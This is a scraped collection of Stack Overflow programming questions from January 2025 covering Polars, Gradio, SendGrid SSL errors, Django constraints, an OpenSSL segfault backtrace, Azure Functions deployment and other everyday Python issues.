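df = pl.DataFrame([{'CCY': 'EUR', 'Qty': 123},
                   {'CCY': 'USD', 'Qty': 456}])

df = df.rename({c: c.lower() for c in df.columns})
print(df.columns)  # ['ccy', 'qty']
</code></pre>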
|
<python><dataframe><python-polars>
|
2025-01-16 09:22:20
| 3
| 3,591
|
Phil-ZXX
|
79,360,623
| 1,553,662
|
gradio UI Button and Image, image not shown after processing
|
<p>I'm building a video analysis tool using Gradio as the UI.
In the UI there is a dropdown and a textbox to select a local video, plus some parameters entered as text.</p>
<p>After clicking the load button, the process starts, but at the end the image output is not shown in the UI.</p>
<p><strong>Relevant notes</strong></p>
<ul>
<li>I reduced the code as much as possible to remove all support functions to list/filter content</li>
</ul>
<p><strong>Code</strong></p>
<pre><code>import gradio as gr
def process_selection(selection, queries):
print("I reach here. This is a long function that after a while returns an image")
return "/local_path_to_image/output.png" # or return Pil.Image object
with gr.Blocks() as demo:
with gr.Row():
with gr.Column():
with gr.Group():
input_dropdown = gr.Dropdown(
choices=get_video_files(), # fn omitted from code brevity
label="Select Input Image",
interactive=True,
allow_custom_value=True,
filterable=True
)
queries = gr.Textbox(
label="Input queries (one per line)",
lines=5,
max_lines=10,
)
load_btn = gr.Button("Load Video")
output_image = gr.Image(label="Output")
load_btn.click(
fn=process_selection,
inputs=[input_dropdown, queries],
outputs=output_image,
show_progress="full" # no progress is shown whatsoever...
)
input_dropdown.input(
fn=filter_files, # fn omitted from code brevity
inputs=input_dropdown,
outputs=input_dropdown
)
</code></pre>
|
<python><gradio>
|
2025-01-16 06:57:35
| 0
| 1,581
|
Stormsson
|
79,360,591
| 10,209,763
|
SSL Certificate Verification Failed with Sendgrid send
|
<p>I am getting an SSL verification failed error when trying to send emails with the SendGrid web API. I'm not even sure what certificate it is trying to verify here. I have done all of the user and domain verification on my SendGrid account, and I am using a very straightforward sending process.</p>
<p>Here's the error:</p>
<pre><code>urllib.error.URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self-signed certificate in certificate chain (_ssl.c:1000)>
</code></pre>
<p>Here's the code:</p>
<pre><code>mailClient = SendGridAPIClient(os.environ.get('sendGridKey'))
message = Mail(
from_email=os.environ['sendGridEmail'],
to_emails="dev@cribbi.co",
subject="User Message for %s" %newMessage['chatId'],
html_content = "<strong>" + newMessage['message']['text'] + "</strong>"
)
mailRes = mailClient.send(message)
</code></pre>
|
<python><python-3.x><sendgrid>
|
2025-01-16 06:42:22
| 1
| 312
|
Mitchell Leefers
|
79,360,261
| 210,867
|
Why does `list()` call `__len__()`?
|
<p>The setup code:</p>
<pre class="lang-py prettyprint-override"><code>class MyContainer:
def __init__(self):
self.stuff = [1, 2, 3]
def __iter__(self):
print("__iter__")
return iter(self.stuff)
def __len__(self):
print("__len__")
return len(self.stuff)
mc = MyContainer()
</code></pre>
<p>Now, in my shell:</p>
<pre class="lang-py prettyprint-override"><code>>>> i = iter(mc)
__iter__
>>> [x for x in i]
[1, 2, 3]
>>> list(mc)
__iter__
__len__
[1, 2, 3]
</code></pre>
<p>Why is <code>__len__()</code> getting called by <code>list()</code>? And where is that documented?</p>
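<p>A small sketch that makes the behaviour visible: <code>list()</code> asks the iterable for a length hint so it can presize the new list (PEP 424; exposed as <code>operator.length_hint</code>, which tries the real length via <code>__len__()</code> first):</p>
<pre class="lang-py prettyprint-override"><code>import operator

mc = MyContainer()
print(operator.length_hint(mc))  # prints "__len__" and then 3 -- the same lookup list() performs
</code></pre>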
|
<python><list>
|
2025-01-16 03:01:17
| 1
| 8,548
|
odigity
|
79,360,171
| 5,755,266
|
Is there a better way to use zip with an arbitrary number of iters?
|
<p>With a set of data from an arbitrary set of lists (or dicts or other iter), I want to create a new list or tuple that has all the first entries, then all the 2nd, and so on, like an hstack.</p>
<p>If I have a known set of data, I can zip them together like this:</p>
<pre><code>data = {'2015': [2, 1, 4, 3, 2, 4],
'2016': [5, 3, 3, 2, 4, 6],
'2017': [3, 2, 4, 4, 5, 3]}
hstack = sum(zip(data['2015'], data['2016'], data['2017']), ())
print(hstack)
# hstack: (2, 5, 3, 1, 3, 2, 4, 3, 4, 3, 2, 4, 2, 4, 5, 4, 6, 3)
</code></pre>
<p>But what if I don't know how many entries (or the keys) of the dict?</p>
<p>For processing an arbitrary set of iterators, I tried:</p>
<pre><code>combined_lists = sum(zip(data[val] for val in data.keys()), ())
# combined_lists: ([2, 1, 4, 3, 2, 4], [5, 3, 3, 2, 4, 6], [3, 2, 4, 4, 5, 3])
</code></pre>
<p>And also:</p>
<pre><code>nums = sum(zip(num for val in data.keys() for num in data[val]), ())
# nums: (2, 1, 4, 3, 2, 4, 5, 3, 3, 2, 4, 6, 3, 2, 4, 4, 5, 3)
</code></pre>
<p>But both of these just keep the same order I could get from adding the sequences together.</p>
<p>I was able to get it to work with:</p>
<pre><code>counts = []
entry = list(data.keys())[0]
for idx, count in enumerate(data[entry]):
for val in list(data.keys()):
counts.append(data[val][idx])
# counts: [2, 5, 3, 1, 3, 2, 4, 3, 4, 3, 2, 4, 2, 4, 5, 4, 6, 3]
</code></pre>
<p>Which is fine, but it's a bit bulky. Seems like there should be a better way.</p>
<p>Is there a way with list comprehension or some feature of zip that I missed?</p>
<p>No imports preferred.</p>
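<p>For what it's worth, a minimal sketch with no imports: <code>zip(*data.values())</code> transposes an arbitrary number of lists (dicts preserve insertion order in Python 3.7+), and a nested comprehension flattens the result:</p>
<pre><code>data = {'2015': [2, 1, 4, 3, 2, 4],
        '2016': [5, 3, 3, 2, 4, 6],
        '2017': [3, 2, 4, 4, 5, 3]}

hstack = tuple(x for group in zip(*data.values()) for x in group)
print(hstack)
# (2, 5, 3, 1, 3, 2, 4, 3, 4, 3, 2, 4, 2, 4, 5, 4, 6, 3)
</code></pre>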
|
<python>
|
2025-01-16 01:55:56
| 3
| 535
|
Zim
|
79,360,156
| 3,614,648
|
Why do different prompts affect how I can run Python code in VSCode?
|
<p>In VSCode, I can run Python code from a .py file by selecting the code in the editor then typing shift+enter. It runs without error and opens a Python terminal (prompt turns to <code>>>></code>). However, when my prompt turns to <code>>>></code>, the below approaches to running code produce both <code>SyntaxError: invalid syntax</code> and <code>KeyboardInterrupt</code> errors:</p>
<ul>
<li>Left-clicking the arrow button near the top right of the screen and selecting "Run Python File"</li>
<li>Right-clicking the editor and selecting "Run Python File in Terminal"</li>
</ul>
<p>Other approaches involving the arrow button, right-clicking the editor, or use of shift+enter do not produce these errors. Additionally, if I use any approach that doesn't produce the <code>>>></code> prompt, none of these produce an error.</p>
<p>Can anyone explain what is going on? I can't find any documentation explaining what is happening with the terminal and how it relates to these errors. FWIW, I'm working with a virtual environment containing only <code>numpy</code>.</p>
<p>Here's an example .py file:</p>
<pre class="lang-py prettyprint-override"><code>import numpy as np
msg = "Roll a dice!" # in-line comment
print(msg)
print(np.random.randint(1,9))
print(5+5) # in-line comment
</code></pre>
|
<python><visual-studio-code><terminal><prompt>
|
2025-01-16 01:47:32
| 1
| 4,312
|
socialscientist
|
79,360,047
| 3,841,699
|
Issue with Django CheckConstraint
|
<p>I'm trying to add some new fields to an existing model and also a constraint related to those new fields:</p>
<pre class="lang-py prettyprint-override"><code>class User(models.Model):
username = models.CharField(max_length=32)
# New fields ##################################
has_garden = models.BooleanField(default=False)
garden_description = models.CharField(
max_length=32,
null=True,
blank=True,
)
class Meta:
constraints = [
models.CheckConstraint(
check=Q(has_garden=models.Value(True))
& Q(garden_description__isnull=True),
name="garden_description_if_has_garden",
)
]
</code></pre>
<p>The problem is that when I run my migrations I get the following error:</p>
<pre><code>django.db.utils.IntegrityError: check constraint "garden_description_if_has_garden" is violated by some row
</code></pre>
<p>But I don't understand how the constraint is being violated: no <code>User</code> has <code>has_garden</code> set yet, since the field is only just being created and its default value is <code>False</code> 🤔.</p>
<p>I'm using django 3.2 with postgresql.</p>
<p><strong>What is the proper way to add this constraint?</strong> If it's of any use here's the autogenerated migration:</p>
<pre class="lang-py prettyprint-override"><code># Generated by Django 3.2.25 on 2025-01-15 23:52
import django.db.models.expressions
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("some_app", "0066_user"),
]
operations = [
migrations.AddField(
model_name="user",
name="garden_description",
field=models.CharField(blank=True, max_length=32, null=True),
),
migrations.AddField(
model_name="user",
name="has_garden",
field=models.BooleanField(default=False),
),
migrations.AddConstraint(
model_name="user",
constraint=models.CheckConstraint(
check=models.Q(
("has_garden", django.db.models.expressions.Value(True)),
("garden_description__isnull", True),
),
name="garden_description_if_has_garden",
),
),
]
</code></pre>
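<p>For reference, a sketch of how the rule could be written as an implication so that existing rows with <code>has_garden=False</code> still satisfy it (assuming the intent is "if <code>has_garden</code> is true, a description must be set"):</p>
<pre class="lang-py prettyprint-override"><code>models.CheckConstraint(
    # has_garden=True implies garden_description is not null,
    # i.e. NOT has_garden OR description present
    check=Q(has_garden=False) | Q(garden_description__isnull=False),
    name="garden_description_if_has_garden",
)
</code></pre>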
|
<python><django>
|
2025-01-16 00:12:30
| 2
| 820
|
Adrian Guerrero
|
79,359,954
| 3,446,351
|
Jupyterlab occasionally hangs during simple execution with excessive CPU and memory consumption
|
<p>This is seems to be a Heisenbug so I can't give a reproducible example but I can describe my setup and symptoms.</p>
<p><strong>The symptoms</strong> are simple, occasionally (once every few days, though they seem to cluster) I will execute a simple cell in Jupyterlab, for instance even 1+1 and the kernel will stay busy, sometimes for many seconds and sometimes, like the case I'm watching right now, for 10+ minutes and shows no sign of stopping. CPU is at 100% (for that core) and memory consumption of that process is growing at approximately 1Mb/sec.</p>
<p>I use the jupyterlab-execute-time extension and one additional symptom of this effect is that when it occurs the running execution time footer to the lower right of the running cell, showing live execution time, does <strong>not</strong> appear during execution (I assume because the <em>true</em> execution time is too short for this to be shown).</p>
<p>If the execution does eventually cease then the final execution time is shown to the lower right of the input cell. In the case of something like 1+1 this will show as something like 10ms even though the execution took several seconds at 100% CPU.</p>
<p>Occasionally the execute time extension will write the total execution time below the running cell (in some cases where the actual execution time is O(10ms)) but the kernel continues to run and show busy (and the running cell marked with a *) for several seconds after (if it ever finishes).</p>
<p>I also use the ipywidgets plugin and I suspect this is the root of the problem though waiting for an effect to not occur isn't easy to quantify.</p>
<p><strong>The setup.</strong>
I am running on Windows 10, Python 3.12.8, with Jupyter running in a conda-controlled environment with...</p>
<pre><code>jupyter-lsp=2.2.5=pyhd8ed1ab_1
jupyter-server-mathjax=0.2.6=pyhbbac1ac_2
jupyter_client=8.6.3=pyhd8ed1ab_1
jupyter_core=5.7.2=pyh5737063_1
jupyter_events=0.11.0=pyhd8ed1ab_0
jupyter_server=2.15.0=pyhd8ed1ab_0
jupyter_server_terminals=0.5.3=pyhd8ed1ab_1
jupyterlab=4.3.4=pyhd8ed1ab_0
jupyterlab-git=0.50.2=pyhd8ed1ab_1
jupyterlab_pygments=0.3.0=pyhd8ed1ab_2
jupyterlab_server=2.27.3=pyhd8ed1ab_1
</code></pre>
<p>and ipywidgets 8.1.5 in the kernel environment.</p>
<p>I have reinstalled both environments several times from scratch and the behaviour is persistent.</p>
<p>This feels like the same "kind" of issue with the <a href="https://github.com/jupyterlab/jupyterlab/issues/6267" rel="nofollow noreferrer">variable inspector extension</a> from some time back. But I don't have that extension installed.</p>
<p>Has anyone else seen similar?</p>
<p><strong>Update</strong>: I believe this (often) happens when the cell in question throws an exception resulting in a stacktrace which for some reason either takes a very long time to render or enters an infinite loop.</p>
<p><strong>Update</strong>: I have removed ipywidgets but still see this kind of issue. Just now 1+1 took 7 seconds to return 2. I now suspect this is some issue with pushing the result back into a large notebook. Though the kernel that is busy is the notebook kernel not the Jupyter kernel.</p>
|
<python><jupyter-lab>
|
2025-01-15 23:05:19
| 0
| 691
|
Ymareth
|
79,359,931
| 1,050,482
|
py2app: error: [Errno 17] File exists: when creating the app
|
<p>I'm trying to make a MacOS executable with py2app. I'm having the exact same issue in <a href="https://stackoverflow.com/questions/78859635/py2app-error-17-file-exists-when-running-py2app-for-the-first-time">py2app Error 17 - File exists when running py2app for the first time</a></p>
<p>But the solution there won't work for me since I don't have a .toml file. How can I downgrade setuptools?</p>
|
<python><macos><py2app>
|
2025-01-15 22:49:11
| 1
| 8,761
|
Paul Cezanne
|
79,359,870
| 479,583
|
Why doesn't my collab virtual machine have the capacity to query something in bigquery, but it can process that same query result?
|
<p>I'm aware that my question is somewhat vague, but I didn't know how to frame it in a different matter.</p>
<p>I started using GCP in my latest detachment and there are a few things I'm having issues grasping.</p>
<p>For one, I don't understand why I can process data using</p>
<pre><code>query = f"SELECT * FROM {dataset_name}"
dataset = client.query(query).to_dataframe()
</code></pre>
<p>But if I try to run the actual query that created dataset_name in BigQuery (bypassing the need to save it beforehand), the machine times out (or runs out of memory).
I would think that when I call something like client.query(), the grunt work would be done by BigQuery, and Colab (or Vertex, or whatever you're using) would just wait to receive the output.</p>
<p>What gives?</p>
|
<python><google-bigquery><google-colaboratory>
|
2025-01-15 22:22:08
| 1
| 425
|
Roughmar
|
79,359,697
| 2,800,876
|
Why does Python tuple unpacking work on sets?
|
<p><a href="https://stackoverflow.com/a/3812600/2800876">Sets don't have a deterministic order in Python</a>. Why then can you do tuple unpacking on a set in Python?</p>
<p>To demonstrate the problem, take the following in CPython 3.10.12:</p>
<pre><code>a, b = {"foo", "bar"} # sets `a = "bar"`, `b = "foo"`
a, b = {"foo", "baz"} # sets `a = "foo"`, `b = "baz"`
</code></pre>
<p>I recognize that the literal answer is that Python tuple unpacking works on any iterable. For example, you can do the following:</p>
<pre><code>def f():
yield 1
yield 2
a, b = f()
</code></pre>
<p>But why is there not a check used by tuple unpacking that the thing being unpacked has deterministic ordering?</p>
|
<python><iterable-unpacking>
|
2025-01-15 21:06:11
| 3
| 41,868
|
Zags
|
79,359,592
| 1,119,649
|
Python tabulate - when using icons result in misaligned table
|
<p>When I use icons in tabulate, the printed table comes out misaligned.</p>
<p>Sample:</p>
<pre class="lang-py prettyprint-override"><code>import tabulate
print(tabulate.tabulate([{'head':'msg', 'head2': 'msg2'},{'head':'msg 😀', 'head2': 'msg2 😶'}], headers='keys', tablefmt="grid"))
</code></pre>
<p>Results in:</p>
<p><a href="https://i.sstatic.net/oI3f0vA4.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/oI3f0vA4.png" alt="resulting misaligned table" /></a></p>
<p>Is there any way to solve this?</p>
|
<python><tabulate>
|
2025-01-15 20:15:43
| 1
| 386
|
Shoo Limberger
|
79,359,469
| 3,477,266
|
Debug Segmentation Fault on Python cryptography's OpenSSL bindings
|
<p>My application runs on a Docker container, and it has always run well in AWS VMs.</p>
<p>While trying to deploy some VMs in GCP, I noticed Segmentation Fault errors were killing the container in some of them.</p>
<p>There doesn't seem to be an obvious pattern. The application runs well for days and then just dies; sometimes fewer days, sometimes more.</p>
<p>I was able to generate core dumps from the crashes, but I'm having a hard time figuring them out.</p>
<p>The farthest I went was to get the backtrace below using <code>gdb</code>. I was able to get it after mounting the core dump in a similar container as the original.</p>
<p>It contains some functions in OpenSSL, which are called by the <code>cryptography's</code> package C bindings for OpenSSL.</p>
<p>However, I can't find a way to determine what is causing this segmentation fault. I already had several cases of VMs that died in a very similar way, all pointing to OpenSSL in their core dumps.</p>
<p>Also, I couldn't get Python debug symbols to work in this container. I'm not sure this would be useful, though. It's a Debian 11 image that is set up to use python3.10 as default, but there is no <code>apt install python3.10-dbg</code> available, only for Python 3.9.</p>
<p>I'm also not sure how exactly the host is interfering with the container to cause this, since even the OpenSSL bindings that are used come bundled into the cryptography package.</p>
<p>I was trying to avoid building a new Docker image to debug this, because I'm afraid I could interfere somehow with the problem, since this very same image runs very well on AWS. But that's a possibility in case it helps.</p>
<p>If anyone has any tip on new strategies for debugging this, how to find out the role the host is playing in the problem, or general guesses on what might be happening, would help me a lot.</p>
<p>Versions:</p>
<ul>
<li>cryptography: 38.0.4</li>
<li>OpenSSL (bundled with cryptography): 3.0.7</li>
</ul>
<pre><code># gdb /usr/local/bin/python3.10 /core.dump
(gdb) bt full
#0 0x0000f93ee103cd78 in _PyErr_SetObject () from /usr/local/bin/../lib/libpython3.10.so.1.0
No symbol table info available.
#1 0x0000f93ee10c6a24 in _PyErr_SetString () from /usr/local/bin/../lib/libpython3.10.so.1.0
No symbol table info available.
#2 0x0000f93ee1044244 in ?? () from /usr/local/bin/../lib/libpython3.10.so.1.0
No symbol table info available.
#3 0x0000f93ede93d5d8 in OPENSSL_LH_doall_arg ()
from /usr/local/lib/python3.10/site-packages/cryptography/hazmat/bindings/_openssl.abi3.so
No symbol table info available.
#4 0x0000f93ede93f02c in ossl_namemap_doall_names ()
from /usr/local/lib/python3.10/site-packages/cryptography/hazmat/bindings/_openssl.abi3.so
No symbol table info available.
#5 0x0000f93edea58a20 in OSSL_ENCODER_CTX_new_for_pkey ()
from /usr/local/lib/python3.10/site-packages/cryptography/hazmat/bindings/_openssl.abi3.so
No symbol table info available.
#6 0x0000f93ede9a1cac in i2d_PUBKEY () from /usr/local/lib/python3.10/site-packages/cryptography/hazmat/bindings/_openssl.abi3.so
No symbol table info available.
#7 0x0000f93ede8b3390 in ASN1_i2d_bio ()
from /usr/local/lib/python3.10/site-packages/cryptography/hazmat/bindings/_openssl.abi3.so
No symbol table info available.
#8 0x0000f93ede83c524 in _cffi_f_i2d_PUBKEY_bio (self=<optimized out>, args=<optimized out>)
at build/temp.linux-aarch64-3.6/cryptography.hazmat.bindings._openssl.c:43855
_save = 0xbeefaa544190
x0 = 0xbeefcea289d0
x1 = 0xbeefaa605e00
datasize = <optimized out>
large_args_free = 0x0
result = <optimized out>
pyresult = <optimized out>
arg0 = 0xf93afffc2020
arg1 = 0xf93edd594d10
#9 0x0000f93ee10374b4 in ?? () from /usr/local/bin/../lib/libpython3.10.so.1.0
No symbol table info available.
#10 0x0000f93ee104130c in _PyObject_Call () from /usr/local/bin/../lib/libpython3.10.so.1.0
No symbol table info available.
</code></pre>
<p>Besides this, I've also enabled Python's faulthandler to get a stack trace when the application crashes. I'm not pasting it entirely, but the last 2 lines also point to OpenSSL:</p>
<pre><code>Current thread 0x0000f8e17e8bbd40 (most recent call first):
File "/usr/local/lib/python3.10/site-packages/cryptography/hazmat/backends/openssl/backend.py", line 1024 in load_der_public_key
File "/usr/local/lib/python3.10/site-packages/cryptography/hazmat/primitives/serialization/base.py", line 56 in load_der_public_key
</code></pre>
|
<python><c><linux><openssl><gdb>
|
2025-01-15 19:28:48
| 0
| 1,516
|
luislhl
|
79,359,452
| 15,994,504
|
Diamond Relationship class hierarchy override only one instance of the method inherited from Base Class
|
<p>With a diamond-relationship class hierarchy, how can I override B.x while having C.x continue to inherit from A.x?</p>
<p>My goal is to not edit class A, B, or C since those are used by other classes (e.g. a class E)
However as long as the edits to class A, B, C would not change the behavior for other imports of those classes, editing A, B, or C would be okay.</p>
<p>I think the MRO is D -> B -> C -> A.
Does this mean A can only be overridden once?</p>
<hr />
<h4>Example code - attempt 1</h4>
<pre><code>from dataclasses import dataclass
@dataclass
class A:
@property
def x(self):
return 'a'
@dataclass
class B(A):
def B_method(self):
print(f'{self.x}_B_method')
return
@dataclass
class C(A):
def C_method(self):
print(f'{self.x}_C_method')
return
@dataclass
class D(B, C):
def D_method(self):
B.x = 'b'
self.B_method()
self.C_method()
class_D = D()
class_D.D_method()
</code></pre>
<h4>Example code - attempt 2</h4>
<pre><code>from dataclasses import dataclass
@dataclass
class A:
@property
def x(self):
return 'a'
@dataclass
class B(A):
@property
def x(self):
return 'a'
def B_method(self):
print(f'{self.x}_B_method')
return
@dataclass
class C(A):
@property
def x(self):
return 'a'
def C_method(self):
print(f'{self.x}_C_method')
return
@dataclass
class D(B, C):
def D_method(self):
B.x = 'b'
self.B_method()
self.C_method()
class_D = D()
class_D.D_method()
</code></pre>
<h4>Example Output</h4>
<pre><code>b_B_method
b_C_method
</code></pre>
<h4>Desired output</h4>
<pre><code>b_B_method
a_C_method
</code></pre>
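<p>A quick check of the lookup order that explains the observed output: both <code>B_method</code> and <code>C_method</code> read <code>self.x</code>, and on a <code>D</code> instance that single lookup walks D's MRO, so assigning <code>B.x = 'b'</code> changes what both methods see; getting different values per method would require one of them to bypass <code>self.x</code> (for example via an explicitly class-scoped lookup):</p>
<pre><code>print(D.__mro__)
# (<class '__main__.D'>, <class '__main__.B'>, <class '__main__.C'>,
#  <class '__main__.A'>, <class 'object'>)
</code></pre>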
|
<python><python-3.x><method-resolution-order>
|
2025-01-15 19:23:51
| 1
| 374
|
smurphy
|
79,359,444
| 12,712,848
|
Can't add libraries to function_app.py in azure Function
|
<p>I have, for example, this function</p>
<p><a href="https://i.sstatic.net/pBaLBBvf.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/pBaLBBvf.png" alt="enter image description here" /></a></p>
<p>I deployed it with VS Code using the following <code>F1</code> option in VS Code
<a href="https://i.sstatic.net/fzHCajG6.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/fzHCajG6.png" alt="enter image description here" /></a></p>
<p>Nonetheless, when I go to the function app portal, it shows nothing under the functions submenu:
<a href="https://i.sstatic.net/nuUeDUxP.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/nuUeDUxP.png" alt="enter image description here" /></a></p>
<p>I don't know why I am not able to see my functions in my function app. What am I missing?</p>
<p>Here is the dummy code of the function:</p>
<pre><code>import azure.functions as func
import logging
import os
from azure.identity import DefaultAzureCredential
from azure.keyvault.secrets import SecretClient
from azure.communication.email import EmailClient
from datetime import timezone, timedelta, datetime
import jwt
import bcrypt
import pymssql
import json
from azure.identity import DefaultAzureCredential
from azure.keyvault.secrets import SecretClient
app = func.FunctionApp(http_auth_level=func.AuthLevel.ANONYMOUS)
@app.route(route="actualizar_contrasena", auth_level=func.AuthLevel.ANONYMOUS)
def actualizar_contrasena(req: func.HttpRequest) -> func.HttpResponse:
import json
try:
req_body = req.get_json()
username_to_check = req_body.get("username")
password_to_check = str(req_body.get("password"))
# do things
return func.HttpResponse(
json.dumps(
{"access_token": 1, "refresh_token": 1}
),
status_code=200,
)
except Exception as e:
return func.HttpResponse(str(e), status_code=500)
</code></pre>
<p><strong>UPDATE</strong></p>
<p>After following @RithwikBoj's instructions, I'm in the same situation. I have observed that locally I can't see the functions either:</p>
<p><a href="https://i.sstatic.net/LRo9RZAd.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/LRo9RZAd.png" alt="enter image description here" /></a></p>
<p>This is my <code>host.json</code>:</p>
<pre><code>{
"version": "2.0",
"logging": {
"applicationInsights": {
"samplingSettings": {
"isEnabled": true,
"excludedTypes": "Request"
}
}
},
"extensionBundle": {
"id": "Microsoft.Azure.Functions.ExtensionBundle",
"version": "[4.*, 5.0.0)"
}
}
</code></pre>
<p>And this is my structure:</p>
<pre><code>root
|_.venv
|_.funcignore
|_host.json
|_function_app.py
|_ local.settings.json
</code></pre>
<p><a href="https://i.sstatic.net/L5t7Tsdr.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/L5t7Tsdr.png" alt="enter image description here" /></a></p>
<p>This is my requirements.txt</p>
<pre><code>azure-common==1.1.28
azure-communication-email==1.0.0
azure-core==1.32.0
azure-functions==1.21.3
azure-identity==1.19.0
azure-keyvault-secrets==4.9.0
azure-mgmt-core==1.5.0
bcrypt==4.2.1
certifi==2024.12.14
cffi==1.17.1
charset-normalizer==3.4.1
cryptography==44.0.0
idna==3.10
isodate==0.7.2
jwt==1.3.1
msal==1.31.1
msal-extensions==1.2.0
msrest==0.7.1
oauthlib==3.2.2
portalocker==2.10.1
pycparser==2.22
PyJWT==2.10.1
pymssql==2.3.2
requests==2.32.3
requests-oauthlib==2.0.0
six==1.17.0
typing_extensions==4.12.2
urllib3==2.3.0
</code></pre>
<p>I tried to deploy using my github repo. This is the yaml:</p>
<pre><code># Docs for the Azure Web Apps Deploy action: https://github.com/azure/functions-action
# More GitHub Actions for Azure: https://github.com/Azure/actions
# More info on Python, GitHub Actions, and Azure Functions: https://aka.ms/python-webapps-actions
name: Build and deploy Azure Function App - fnc-app-d
on:
push:
branches:
- develop
workflow_dispatch:
env:
AZURE_FUNCTIONAPP_PACKAGE_PATH: '.' # set this to the path to your web app project, defaults to the repository root
PYTHON_VERSION: '3.11' # set this to the python version to use (supports 3.6, 3.7, 3.8)
jobs:
build:
runs-on: ubuntu-latest
permissions:
contents: read #This is required for actions/checkout
steps:
- name: Checkout repository
uses: actions/checkout@v4
- name: Setup Python version
uses: actions/setup-python@v5
with:
python-version: ${{ env.PYTHON_VERSION }}
- name: Create and start virtual environment
run: |
python -m venv venv
source venv/bin/activate
- name: Install dependencies
run: pip install -r requirements.txt
# Optional: Add step to run tests here
- name: Zip artifact for deployment
run: zip -r release.zip function_app.py host.json -x "*.txt venv/*" ".git/*" ".github/* *.md .gitignore local.*"
- name: Upload artifact for deployment job
uses: actions/upload-artifact@v4
with:
name: python-app
path: |
.
!venv/
deploy:
runs-on: ubuntu-latest
needs: build
permissions:
id-token: write #This is required for requesting the JWT
contents: read #This is required for actions/checkout
steps:
- name: Download artifact from build job
uses: actions/download-artifact@v4
with:
name: python-app
path: .
- name: Unzip artifact for deployment
run: unzip -o release.zip
- name: Login to Azure
uses: azure/login@v2
with:
client-id: ${{ secrets.AZUREAPPSERVICE_CLIENTID_06 }}
tenant-id: ${{ secrets.AZUREAPPSERVICE_TENANTID_88510E }}
subscription-id: ${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_38D5 }}
- name: 'Deploy to Azure Functions'
uses: Azure/functions-action@v1
id: deploy-to-function
with:
app-name: 'fnc-app-d'
package: ${{ env.AZURE_FUNCTIONAPP_PACKAGE_PATH }}
</code></pre>
<p>I realised that the requirements.txt has something wrong with it in the Function App
<a href="https://i.sstatic.net/OfyJgx18.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/OfyJgx18.png" alt="enter image description here" /></a></p>
<p>And the folder structure has not been updated, because I removed the Readme.md a while ago:
<a href="https://i.sstatic.net/3GKoMkMl.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/3GKoMkMl.png" alt="enter image description here" /></a></p>
<p><strong>UPDATE</strong>
I have edited the YAML; now it uploads the requirements.txt file correctly.</p>
<p><strong>UPDATE 2</strong>
I have deleted all imports except os, logging and azure.functions. After that, my function deploys correctly. But when I add, for example, <code>import jwt</code> to the Python script, it disappears again. I need to add libraries to the script; <strong>that is my main issue</strong>.</p>
<p><strong>UPDATE 3</strong> Adding the import inside the definition of each function seems to work:</p>
<pre><code>@app.route(route="log_in_user", auth_level=func.AuthLevel.ANONYMOUS)
def log_in_user(req: func.HttpRequest) -> func.HttpResponse:
import json
import jwt # ADDED HERE THE LIBRARY
try:
req_body = req.get_json()
username_to_check = req_body.get("username")
password_to_check = str(req_body.get("password"))
p = jwt.encode({"pass": password_to_check}, "assaasassa", algorithm="HS256")
return func.HttpResponse(
json.dumps(
{"access_token": 1, "refresh_token": 1, "p": p}
),
status_code=200,
)
except Exception as e:
return func.HttpResponse(str(e), status_code=500)
</code></pre>
<p>It is now deployed. But when I try to execute it in Azure:</p>
<pre><code>Result: Failure Exception: ModuleNotFoundError: No module named 'jwt'
</code></pre>
|
<python><azure><azure-functions>
|
2025-01-15 19:20:49
| 2
| 841
|
OK 400
|